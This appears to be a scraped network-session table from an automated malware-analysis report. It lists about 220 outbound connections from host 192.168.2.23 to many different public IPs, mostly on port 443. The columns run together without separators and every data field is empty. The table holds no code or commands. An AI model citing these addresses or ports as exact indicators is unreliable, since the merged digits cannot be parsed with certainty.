                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21472192.168.2.2350516140.225.121.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21473192.168.2.234498468.250.151.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21474192.168.2.2356418111.116.11.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21475192.168.2.2356246113.237.173.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21476192.168.2.233443051.222.210.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21477192.168.2.2351582132.249.26.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21478192.168.2.2347052189.20.9.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21479192.168.2.234311424.190.56.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21480192.168.2.2350636136.79.117.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21481192.168.2.2346272167.199.242.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21482192.168.2.2345026133.98.249.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21483192.168.2.233885490.153.22.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21484192.168.2.234921093.247.255.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21485192.168.2.233883265.50.163.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21486192.168.2.23496904.0.62.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21487192.168.2.234960497.242.191.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21488192.168.2.234449479.248.245.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21489192.168.2.2343710102.122.194.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21490192.168.2.2342378104.162.248.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21491192.168.2.2338622203.167.146.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21492192.168.2.2355916155.80.239.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21493192.168.2.2354764158.178.78.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21494192.168.2.2334528143.247.202.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21495192.168.2.2335056222.186.211.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21496192.168.2.2357646146.242.79.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21497192.168.2.234147465.116.148.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21498192.168.2.234696834.181.214.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21499192.168.2.233381084.176.178.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21500192.168.2.2343520188.148.57.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21501192.168.2.233772653.96.76.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21502192.168.2.2352530101.184.177.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21503192.168.2.2351694151.150.102.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21504192.168.2.2336308160.172.144.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21505192.168.2.2347226117.157.246.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21506192.168.2.2346924166.60.69.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21507192.168.2.2344580147.106.176.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21508192.168.2.2345670138.180.60.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21509192.168.2.2335392203.217.128.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21510192.168.2.2336942163.220.111.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21511192.168.2.2336310163.190.115.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21512192.168.2.2339172136.53.82.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21513192.168.2.2338186167.59.130.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21514192.168.2.235246024.246.205.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21515192.168.2.236033064.5.128.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21516192.168.2.235142072.249.31.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21517192.168.2.234192027.141.26.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21518192.168.2.2346010111.43.154.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21519192.168.2.2349368158.164.146.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21520192.168.2.234202643.31.80.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21521192.168.2.2349824217.97.42.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21522192.168.2.234066473.173.108.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21523192.168.2.234754064.48.135.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21524192.168.2.2355958159.238.45.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21525192.168.2.2344970159.49.250.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21526192.168.2.2357832203.216.82.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21527192.168.2.2339366184.198.242.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21528192.168.2.2360584183.71.214.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21529192.168.2.2351896109.31.67.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21530192.168.2.235908017.119.172.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21531192.168.2.2344978160.208.195.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21532192.168.2.2357614146.4.134.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21533192.168.2.233412043.176.47.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21534192.168.2.2353746103.58.51.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21535192.168.2.2335712220.162.175.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21536192.168.2.2358262182.248.35.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21537192.168.2.234922427.190.7.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21538192.168.2.234845261.165.162.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21539192.168.2.2350600118.176.10.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21540192.168.2.2342140183.209.197.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21541192.168.2.2345718140.236.92.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21542192.168.2.2359346210.254.144.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21543192.168.2.2348878116.13.47.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21544192.168.2.235037645.69.145.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21545192.168.2.234701050.227.39.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21546192.168.2.2332858133.13.123.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21547192.168.2.2344852195.63.71.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21548192.168.2.2337272209.76.183.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21549192.168.2.2347382161.246.127.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21550192.168.2.2347930142.124.190.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21551192.168.2.235224234.175.181.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21552192.168.2.234708288.104.71.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21553192.168.2.2356600113.14.214.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21554192.168.2.2347742164.93.62.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21555192.168.2.233797817.228.92.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21556192.168.2.233894879.209.140.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21557192.168.2.23384164.149.74.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21558192.168.2.235463027.60.130.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21559192.168.2.2349522143.221.6.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21560192.168.2.2340666190.82.229.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21561192.168.2.2333056203.76.153.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21562192.168.2.235837472.180.39.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21563192.168.2.2333442155.115.125.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21564192.168.2.2359756150.15.75.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21565192.168.2.2355248153.93.119.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21566192.168.2.2346346189.28.85.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21567192.168.2.2355668146.65.188.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21568192.168.2.2347668173.121.52.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21569192.168.2.234113693.101.7.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21570192.168.2.2348046193.35.80.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21571192.168.2.234832243.65.2.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21572192.168.2.2346486105.227.209.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21573192.168.2.233930850.169.143.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21574192.168.2.2354654201.146.129.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21575192.168.2.233880692.183.220.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21576192.168.2.2347076116.62.248.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21577192.168.2.235922680.216.200.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21578192.168.2.2340902153.228.2.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21579192.168.2.234322069.168.4.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21580192.168.2.235477223.132.61.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21581192.168.2.2355746186.89.106.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21582192.168.2.2358584123.200.71.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21583192.168.2.233917024.157.66.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21584192.168.2.2359322110.85.161.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21585192.168.2.2356952114.200.195.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21586192.168.2.2353576207.117.224.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21587192.168.2.2352046200.158.240.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21588192.168.2.2336706184.165.41.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21589192.168.2.234616834.34.201.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21590192.168.2.235932069.175.153.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21591192.168.2.233472632.114.65.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21592192.168.2.2360172116.108.64.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21593192.168.2.235554264.253.208.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21594192.168.2.2358960162.39.147.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21595192.168.2.235861891.192.62.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21596192.168.2.2354046199.209.239.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21597192.168.2.235817613.119.44.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21598192.168.2.234115412.231.45.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21599192.168.2.2343296140.54.249.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21600192.168.2.2346044177.133.55.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21601192.168.2.2359982101.184.207.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21602192.168.2.234622651.12.231.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21603192.168.2.2359064146.192.21.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21604192.168.2.2342516222.138.132.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21605192.168.2.2353262201.29.174.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21606192.168.2.2332872220.141.202.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21607192.168.2.2352270216.37.183.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21608192.168.2.2353616150.55.21.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21609192.168.2.235732280.72.98.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21610192.168.2.235645483.128.167.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21611192.168.2.2341570211.126.172.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21612192.168.2.23606189.19.215.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21613192.168.2.234742417.200.69.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21614192.168.2.2358552136.26.22.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21615192.168.2.2357132221.80.204.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21616192.168.2.2355216152.191.241.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21617192.168.2.235363254.169.228.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21618192.168.2.233893285.223.104.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21619192.168.2.233960481.62.128.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21620192.168.2.23386742.100.8.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21621192.168.2.2343306165.236.211.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21622192.168.2.234033065.23.164.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21623192.168.2.2344620136.26.81.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21624192.168.2.2342190179.244.117.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21625192.168.2.2355882181.229.239.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21626192.168.2.2341784182.154.109.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21627192.168.2.2341438217.132.205.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21628192.168.2.235231298.248.242.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21629192.168.2.2340802101.230.230.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21630192.168.2.2338422191.148.250.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21631192.168.2.235547684.210.28.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21632192.168.2.2344354209.151.6.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21633192.168.2.236017670.73.117.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21634192.168.2.2342532145.250.251.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21635192.168.2.233775046.215.215.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21636192.168.2.2333136173.34.243.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21637192.168.2.234181831.235.60.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21638192.168.2.233670224.181.135.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21639192.168.2.235318639.218.149.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21640192.168.2.234357224.127.148.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21641192.168.2.2341340216.59.88.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21642192.168.2.2354818213.189.38.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21643192.168.2.235318095.117.176.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21644192.168.2.2356134138.115.251.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21645192.168.2.234621487.15.96.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21646192.168.2.2348134112.6.171.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21647192.168.2.2350182119.124.175.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21648192.168.2.2350680122.177.100.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21649192.168.2.234539688.40.177.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21650192.168.2.2358620200.31.104.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21651192.168.2.2341102122.233.167.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21652192.168.2.2340596200.0.253.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21653192.168.2.2351906167.232.73.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21654192.168.2.2335388113.159.154.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21655192.168.2.2336848128.34.140.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21656192.168.2.2347428104.48.243.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21657192.168.2.234263017.234.148.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21658192.168.2.234772858.234.156.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21659192.168.2.2355152105.70.11.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21660192.168.2.235905624.176.210.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21661192.168.2.2340120102.119.160.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21662192.168.2.235436671.106.210.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21663192.168.2.233727497.154.246.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21664192.168.2.2339576129.110.122.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21665192.168.2.2339104188.11.129.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21666192.168.2.2341582143.217.12.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21667192.168.2.2349572212.222.42.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21668192.168.2.234801242.104.53.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21669192.168.2.233749890.226.49.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21670192.168.2.233929638.133.209.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21671192.168.2.2343154151.238.88.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21672192.168.2.2340480113.21.160.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21673192.168.2.235524637.112.216.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21674192.168.2.236059419.177.254.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21675192.168.2.235053442.229.9.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21676192.168.2.235563049.142.180.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21677192.168.2.235833277.223.172.1318080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21678192.168.2.233750614.37.245.2088080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21679192.168.2.2340242125.134.244.658080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21680192.168.2.233677254.91.234.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21681192.168.2.233597438.168.211.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21682192.168.2.2347958129.172.249.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21683192.168.2.2347250156.214.107.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21684192.168.2.2359526140.196.215.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21685192.168.2.2342924178.118.137.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21686192.168.2.233401088.226.145.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21687192.168.2.2359934211.249.185.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21688192.168.2.2341586137.9.230.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21689192.168.2.234888686.110.217.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21690192.168.2.2356786160.56.239.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21691192.168.2.235028293.1.149.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21692192.168.2.235194495.185.51.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
